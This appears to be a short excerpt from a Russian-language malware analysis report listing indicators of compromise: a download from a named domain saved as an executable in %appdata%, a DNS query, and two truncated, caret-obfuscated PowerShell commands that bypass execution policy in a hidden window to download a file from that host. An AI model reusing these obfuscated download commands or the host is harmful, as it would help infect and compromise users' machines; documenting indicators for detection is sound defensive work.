Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "powErS^H^ElL^.^exE^ ^-eXec^U^TI^oNpOL^IcY by^paS^s ^-nO^P^rO^FI^l^e ^-wINDO^W^STYle h^idDe^N^ (n^ew-O^bj^e^cT SYs^teM^.^n^e^T.wE^bclIEn^T).^dOw^n^LoaDf^IlE('http://rootaleyz.top/...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /c "powErS^H^ElL^.^exE^ ^-eXec^U^TI^oNpOL^IcY by^paS^s ^-nO^P^rO^FI^l^e ^-wINDO^W^STYle h^idDe^N^ (n^ew-O^bj^e^cT SYs^teM^.^n^e^T.wE^bclIEn^T).^dOw^n^LoaDf^IlE('http://rootaleyz.top/...' (со скрытым окном)